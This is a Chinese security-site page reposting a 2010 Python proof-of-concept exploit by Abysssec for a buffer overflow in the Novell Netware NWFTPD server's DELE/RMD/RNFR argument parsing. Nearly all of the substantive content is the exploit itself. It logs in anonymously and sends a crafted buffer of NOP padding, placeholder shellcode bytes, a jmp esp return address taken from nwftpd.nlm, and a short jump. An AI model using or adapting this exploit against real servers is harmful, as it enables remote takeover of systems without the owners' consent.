首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow
来源:http://www.abysssec.com 作者:Abysssec 发布时间:2010-09-08  

'''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <  Day 7 - (Binary Analysis)
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

 http://www.exploit-db.com/moaub-7-novell-netware-nwftpd-rmdrnfrdele-argument-parsing-buffer-overflow/
'''

'''
  Title            :  Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow
  Version          :  NWFTPD.NLM 5.09.02 (Netware 6.5 – SP8)
  Analysis         :  http://www.abysssec.com
  Vendor           :  http://www.Novell.com
  Impact           :  Critical
  Contact          :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter          :  @abysssec
'''
from ftplib import FTP
import sys

try:
 netwareServerIp = '127.0.0.1'
 ftp = FTP(netwareServerIp)     
 ftp.login('anonymous','a@a')
 buffer = "/"
 buffer += "\x90"*107      #nops
 buffer += "\xcc"*413    #shellcode part2 = 413 byte
 buffer += "\xb9\xa4\xe0\x91"   #EIP - jmp esp from nwftpd.nlm module
 buffer += "\xcc"*124    #shellcode part1 = 124 byte
 buffer += "\x08\xeb\x90\x90\x90\x90"   #short jmp to shellcode part2
 ftp.voidcmd('DELE ' + buffer)
 
except Exception,err:
 print err
 

 

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·win32/vista sp1 ING. (cmd.exe)
·Java Bridge v. 5.5 Directory T
·phpcrs <= 3.Za / Local File In
·ColdCalendar 2.06 SQL Injectio
·IZArc DLL Hijacking (ztv7z.dll
·ColdUserGroup 1.06 Blind SQL I
·HP OpenView NNM webappmon.exe
·QQPlayer 2.3.696.400p1(.wav) D
·Gantry Framework 3.0.10 (Jooml
·Internet Download Accelerator
·myBB 1.0.6 Denial of Service E
·Integard Home and Pro v2 Remot
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved